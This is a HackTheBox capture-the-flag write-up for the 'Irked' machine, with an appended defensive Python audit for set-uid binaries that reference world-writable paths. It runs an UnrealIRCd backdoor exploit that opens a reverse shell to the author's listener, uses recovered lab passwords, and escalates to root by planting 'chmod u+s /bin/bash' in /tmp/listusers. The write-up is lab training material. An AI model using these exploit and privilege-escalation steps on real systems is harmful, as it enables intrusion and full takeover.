Irked

#Linux #Enumeration #IRC

Irked is an easy-rated Linux machine from HackTheBox, created by MrAgent. In this post, my IP is 10.10.14.27, and the target IP is 10.129.124.47.

This machine is straightforward. It follows the basic steps for enumeration and exploitation, with some research included.

Gathering Information

The first steps gather basic information about the target, using nmap and looking at the website.

Local Terminal
nmap -p- --open -T5 -v -n 10.129.124.47
There is a website, and several ports related to IRC (Internet Relay Chat). We need more details.
Local Terminal
nmap -sCV -p 22,80,111,6697,8067,34716,65534 10.129.124.47
An IRC service is definitely running. IRC is a real-time communication protocol, and this is the service we can exploit.
Local Terminal
whatweb -v http://10.129.124.47
Nothing relevant
Source code of the target website

We have limited information, but that phrase is enough. At this point our best option is to search for "UnrealIRCd exploit"; you will find one on GitHub.

Weaponization and Exploitation

Local Terminal
git clone https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor 
cd UnrealIRCd-3.2.8.1-Backdoor/
batcat exploit.py

A few values need to be changed: put your own machine's details there (here: 10.10.14.27 // 443). Reading further, you will find several payloads that are selected through an argument; we will use bash.

List of payloads
How to use exploit.py

Here we need to open a new terminal and listen on port 443.

Local Terminal [B]
nc -nlvp 443
Local Terminal [A]
python3 exploit.py 10.129.124.47 6697 -payload bash

We use target port 6697 because the IRC service listens there. After running the exploit, the message “Exploit sent successfully” appears and the second local terminal [B] is connected to the target; from here on it is called [IRCD]. Next comes some TTY treatment.

Target Terminal [IRCD]
cd /
find . -name user.txt 2>/dev/null

After exploring a little, we find a hidden backup file in /home/djmardov/Documents. Let’s read it with cat and see what it contains.

Backup hidden file
Content of .backup

Here we have two things: a clue about steganography, maybe pointing to the image at the URL, and a password, probably related to the steganography step. Now download the image from http://10.129.124.47 (the angry face) and open a local terminal.

Local Terminal
exiftool irked.jpg
Nothing weird
Local Terminal
strings irked.jpg
steghide extract -sf irked.jpg              # Without password, it fails.
steghide extract -sf irked.jpg              # pass: UPupDOWNdownLRlrBAbaSSss
cat pass.txt
New password!

Using steghide, we extract a new password, “Kab6h+m+bbp2J:HG”. We can try it in [IRCD] to switch user.

Target Terminal [IRCD]
su djmardov                            #Pass: Kab6h+m+bbp2J:HG

It works: we are now djmardov and can read the flag at /home/djmardov/Documents/user.txt

Privilege Escalation

Target Terminal [Djmardov]
cd /
find . -perm -4000 2>/dev/null
It looks like a custom command
Target Terminal [Djmardov]
/usr/bin/viewuser
A beta for a command to work with permissions?
Target Terminal [Djmardov]
strings /usr/bin/viewuser
Using strings, we can see that it needs the file /tmp/listusers
But that file doesn’t even exist

We lose nothing by trying to create that file and putting a command inside it.

Target Terminal [Djmardov]
touch /tmp/listusers
chmod +x /tmp/listusers
nano /tmp/listusers
Content of /tmp/listusers
#!/bin/bash

chmod u+s /bin/bash
Target Terminal [Djmardov]
ls -l /bin/bash
It looks like we can use it now. It works!
Target Terminal [Djmardov]
bash -p
Target Terminal [root]
cat /root/root.txt
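
The escalation above works because a set-uid binary runs /tmp/listusers, a path any local user can create. The following audit is an added example, not part of the original write-up: it automates the find and strings steps from a defender's side, listing set-uid files whose contents reference a path under a world-writable directory. The directory list and the sample files in demo() are assumptions constructed for the example.

```python
import os
import re
import stat
import tempfile

# Assumed list of world-writable directories; extend it for your hosts.
WRITABLE_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
_PREFIX = b"|".join(re.escape(d.encode()) for d in WRITABLE_DIRS)
PATH_RE = re.compile(rb"(?<![\w.\-/])(?:" + _PREFIX + rb")/[\w.\-/]+")

def writable_path_refs(data: bytes) -> list:
    """Sorted unique paths under WRITABLE_DIRS embedded in a file's bytes."""
    return sorted({m.decode() for m in PATH_RE.findall(data)})

def is_setuid_file(mode: int) -> bool:
    """Same selection as `find -perm -4000`, restricted to regular files."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)

def audit(root: str) -> dict:
    """Map each set-uid file under root to the writable paths it references."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                if is_setuid_file(os.lstat(path).st_mode):
                    with open(path, "rb") as fh:
                        refs = writable_path_refs(fh.read())
                    if refs:
                        findings[path] = refs
            except OSError:
                continue  # unreadable or vanished file: skip it
    return findings

def demo() -> dict:
    """Run the audit over constructed files (not the real viewuser binary)."""
    with tempfile.TemporaryDirectory() as d:
        samples = {"viewuser": (b"\x7fELF\x00setuid\x00/tmp/listusers\x00", 0o4755),
                   "plain": (b"/tmp/listusers\x00", 0o755),       # no set-uid bit
                   "clean": (b"\x7fELF\x00/etc/passwd\x00", 0o4755)}  # no /tmp path
        for name, (data, mode) in samples.items():
            path = os.path.join(d, name)
            with open(path, "wb") as fh:
                fh.write(data)
            os.chmod(path, mode)
        return {os.path.basename(p): r for p, r in audit(d).items()}

if __name__ == "__main__":
    print(demo())
```

On a real host, call audit("/") as root and review each hit: a set-uid program should only execute or read files from directories that unprivileged users cannot write to.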
